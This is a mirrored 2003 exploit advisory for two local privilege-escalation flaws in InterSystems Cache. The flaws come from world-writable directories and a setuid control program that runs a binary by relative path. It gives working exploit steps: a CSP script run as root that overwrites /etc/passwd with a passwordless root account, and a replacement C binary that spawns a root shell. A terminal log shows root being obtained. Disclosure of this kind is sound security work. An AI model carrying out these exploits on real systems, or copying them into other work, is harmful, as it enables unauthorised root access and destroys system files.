Lucene search
K

intersystems2.txt

🗓️ 26 Aug 2003 00:00:00Reported by Larry W. CashdollarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

Local attackers exploit directory permissions to gain root access via Intersystems Cache vulnerabilities.

Code
`  
Here are more details of my research...  
  
http://packetstormsecurity.nl/0307-exploits/intersystems.txt  
  
These are more details for the above advisory.  
  
Vuln1  
  
Local attackers can exploit this to manipulate directories and binaries  
inside the installation tree. This may be used by a local malicious user  
to gain root access. The content in /cachesys/csp/user is executed as  
root through the web interface. user's parent directory (csp) is world  
writeable allowing a local non root user to move user aside, copy its  
contents and create a new writeable user directory.  
  
1. mv /cachesys/csp/user /cachesys/csp/user.old  
2. cp -rp /cachesys/csp/user /cachesys/csp/user.old  
3. cp cspexp.csp /cachesys/csp/user  
4. lnyx http://localhost/csp/user/cspexp.csp  
5. su - cache  
  
<------------------cspexp.csp------------->  
  
<html>  
  
Intersystems Cache' local root exploit.  
Larry W. Cashdollar  
http://vapid.dhs.org  
  
Because of poor default file and directory permissions a localuser can  
execute  
code as root via the cache CSP interpreter.  
<HR>  
Attempting to overwrite /etc/passwd with cache::0:0:root:/root:/bin/bash.  
  
<script language=Cache runat=server>  
Set cdef=##class(%Library.File).%New("/etc/passwd")  
Do cdef.Open("WSN")  
Do cdef.WriteLine("cache::0:0:root:/root:/bin/bash")  
Do cdef.%Close()  
</script>  
  
</html>  
  
  
Vuln 2  
---------  
A user who is a member of the group configured at installation to start  
and stop the cache database can get local root access by exploting poor  
file permissions and the use of relative path names in setuid binaries.  
  
Using the following method.  
  
1. mv /path/to/cache/bin/cache /path/to/cache/bin/cache.orig  
2. cd /path/to/cache/bin  
3. cat cache.c << -EOF-  
#include <stdio.h>  
  
int main(void) {  
setuid(0);setgid(0);  
system("/bin/sh");  
}  
-EOF-  
4. gcc cache.c -o cache  
5. ./cuxs  
  
Details:  
  
cuxs is setuid root and can be configured as executeable by a specific  
group upon installation of Cache' database.  
  
cuxs is a control program for Cache, it executes Cache using the following  
system call:  
execve("../bin/cache",["cache"],...  
since by default bin is world write able the binary cache can be moved and  
replaced by a malicous one.  
  
[lwc@boureguard lwc]$ cd /usr/ecache  
[lwc@boureguard ecache]$ ls -ld bin;cd bin  
drwxrwxrwx 2 root root 4096 Mar 18 07:13 bin  
[lwc@boureguard bin]$ mv cache cache.orig  
[lwc@boureguard bin]$ gcc cache.c -o cache  
[lwc@boureguard bin]$ id  
uid=500(lwc) gid=500(lwc) groups=500(lwc),10(wheel)  
[lwc@boureguard bin]$ ls -l cuxs  
-rwsr-x--- 1 root wheel 16488 Mar 18 06:49 cuxs  
[lwc@boureguard bin]$ ./cuxs  
sh-2.05a# id  
uid=0(root) gid=0(root) groups=500(lwc),10(wheel)  
sh-2.05a#  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation